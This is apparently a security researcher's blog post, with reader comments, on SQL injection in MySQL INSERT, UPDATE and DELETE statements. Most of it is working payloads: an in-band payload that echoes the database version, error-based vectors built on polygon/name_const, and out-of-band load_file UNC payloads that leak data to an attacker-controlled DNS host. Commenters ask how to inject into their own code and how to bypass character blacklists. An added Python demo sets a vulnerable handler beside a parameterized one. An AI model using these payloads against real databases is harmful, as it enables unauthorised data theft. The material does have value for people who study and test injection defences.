# Overview

The traditional in-band method for injections in INSERT and UPDATE statements is to fix the query. In an INSERT statement you can simply close the value you control, supply the remaining columns yourself, comment out the rest and read the data once the application echoes it back. The same goes for UPDATE, but only when the statement sets more than one column can we fix the query that way. What if we face a situation where the UPDATE or INSERT has only one column, or we simply don't know the exact query we need to fix? And what if mysql_error() is not echoed out?
Let's look at the following scenario. For simplicity's sake, let's not make things complex: the updated username is also echoed back to us. How can we inject in this scenario?





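The scenario's source is not reproduced on this page. As an added example, not the author's code, here is a constructed stand-in in Python: the vulnerable registration handler splices the id into an INSERT and echoes the stored username, and the payload closes the quoted id, plants a subquery in the username column, closes the statement and comments out the rest. SQLite is used so it runs offline, so MySQL's `@@version` is replaced by SQLite's `sqlite_version()`; the table layout `users(id, user, pass)` and the handler names are assumptions. A parameterized handler is shown beside it for contrast.

```python
# Added example, not the author's code. SQLite stands in for MySQL, so
# sqlite_version() replaces @@version; the users(id, user, pass) layout is assumed.
import sqlite3

# Constructed payload, sent as the "id" field: close the quoted id, supply the
# remaining two columns ourselves (a subquery and a dummy password), terminate
# the statement and comment out whatever the application appends after it.
PAYLOAD = "16',(SELECT sqlite_version()),'XXX');-- -"


def make_db():
    """Fresh in-memory database with the assumed three-column table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, user TEXT, pass TEXT)")
    return conn


def vulnerable_register(conn, id_, user, pw):
    """Vulnerable handler: the INSERT is built by string concatenation.

    Equivalent to mysql_query("INSERT INTO users VALUES ('$id','$user','$pass')").
    Returns the username of the row just inserted, which the application echoes.
    """
    sql = f"INSERT INTO users VALUES ('{id_}','{user}','{pw}')"
    cur = conn.execute(sql)  # the trailing "-- ..." is a comment, so one statement runs
    row = conn.execute("SELECT user FROM users WHERE rowid=?", (cur.lastrowid,)).fetchone()
    return row[0]


def safe_register(conn, id_, user, pw):
    """Hardened handler: placeholders keep the payload as plain data."""
    cur = conn.execute("INSERT INTO users VALUES (?,?,?)", (id_, user, pw))
    row = conn.execute("SELECT user FROM users WHERE rowid=?", (cur.lastrowid,)).fetchone()
    return row[0]


def stored_rows(conn):
    """Everything in the table, to see what actually landed there."""
    return conn.execute("SELECT id, user, pass FROM users").fetchall()


def db_version():
    """What the injected subquery is expected to return on this machine."""
    return sqlite3.sqlite_version


if __name__ == "__main__":
    echoed = vulnerable_register(make_db(), PAYLOAD, "test", "test")
    print("vulnerable handler echoed:", echoed)      # the database version string
    echoed = safe_register(make_db(), PAYLOAD, "test", "test")
    print("parameterized handler echoed:", echoed)   # just "test"
```

With the vulnerable handler the stored row is `('16', <version>, 'XXX')`, so the "updated username" the application prints is the database version; with placeholders the whole payload is stored as the id and the echoed username stays `test`.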
We can inject like this if the value of `$user` is echoed back to us by the application:

```
id=16',(SELECT @@version), 'XXX');-- -&user=test&pass=test
```

The injected id closes the quoted value, supplies the remaining columns itself (a subquery as the username and a dummy password), closes the statement and comments out whatever follows, so the version string is stored in the username column and echoed back.

# Error Based Injection

I wrote a paper on injections in INSERT, UPDATE and DELETE statements back in the day (I was 17, to be precise; I feel I should have written it better :)). You can use any error-based vector by following the same syntax as in these examples. The data comes back inside the error message, so this only helps when the database error reaches the response.

## Update Statement

```sql
UPDATE users SET password = 'osanda'*multipoint((select*from(select name_const(version(),1))x))*'' WHERE id='16';

UPDATE users SET password = 'osanda' WHERE id='16'*polygon((select*from(select name_const(version(),1))x))*'';
```

## Insert Statement

```sql
INSERT INTO users VALUES (17,'james', 'bond'*polygon((select*from(select name_const(version(),1))x))*'');
```

## Delete Statement

```sql
DELETE FROM users WHERE id='17'*polygon((select*from(select name_const(version(),1))x))*'';
```

Instead of `*` you can use ||, or, |, and, &&, &, >>, <<, ^, xor, <=, <, >, >=, /, div, -, +, %, mod.

# Out-of-Band (OOB) Injections

You can check my previous research, where I described MySQL OOB techniques under Windows in detail. The same methods can be applied in INSERT, UPDATE and DELETE statements. The UNC path makes a Windows MySQL server resolve a hostname that carries the data (here, the version string), so the lookup shows up on a DNS server you control; load_file() requires the FILE privilege and is subject to secure_file_priv.

## Update Statement

```sql
UPDATE users SET username = 'osanda'<=>load_file(concat('\\\\',version(),'.hacker.site\\a.txt')) WHERE id='15';

UPDATE users SET username = 'osanda' WHERE id='15'*load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
```

## Insert Statement

```sql
INSERT into users VALUES (15,'james','bond'|load_file(concat('\\\\',version(),'.hacker.site\\a.txt')));
```

## Delete Statement

```sql
DELETE FROM users WHERE id='15'*load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
```

You can use ||, or, |, and, &&, &, >>, <<, ^, xor, <=, <, >, >=, *, /, div, -, +, %, mod.

# Conclusion

Exploitation of a vulnerability is not straightforward in real-world scenarios.
It's up to you to make use of these techniques and come up with a creative solution when exploiting SQL injection vulnerabilities. Analyze the situation and apply the techniques that fit it.

# Acknowledgements

Special thanks to Mukarram Khalid (@themakmaniac) for reviewing and testing my research.

SQLi is often a cancerous topic; if you plan to copy or share, please give credit to the author.

## 14 thoughts on "MySQL Injection in Update, Insert and Delete"

1. ```php
   $addr= $_POST['addr'];
   mysql_query("Update account SET adr='$addr' where username='$user'");
   .........
   ........
   if($addr1['addr'] != ''){
       echo $btcadr1['addr_adr'];
   }else {
       echo 'You havent added an address yet.';
   }
   ```
   How can I inject in this statement?
   - The exact same problem and solution I have explained here :)
   - I'm a beginner, so could you explain more? For example, I want to grab the database name; what POST should I send?
   - Send me your app, I'll have a look.
2. The zero value returned for your string is probably because it's not in the table (Boolean false). Yeah, it may be represented with 64 bits.
3. Hey, what if all the special characters are blocked but there is an SQLi? How can we bypass it? Example of special characters: ( + , * , - , / , \ , ( ) , $ , & , # , @ , = , ; , " , ' , ? , _ , % )
   Can such blacklisting of special characters help to overcome SQLi, or is there a bypass?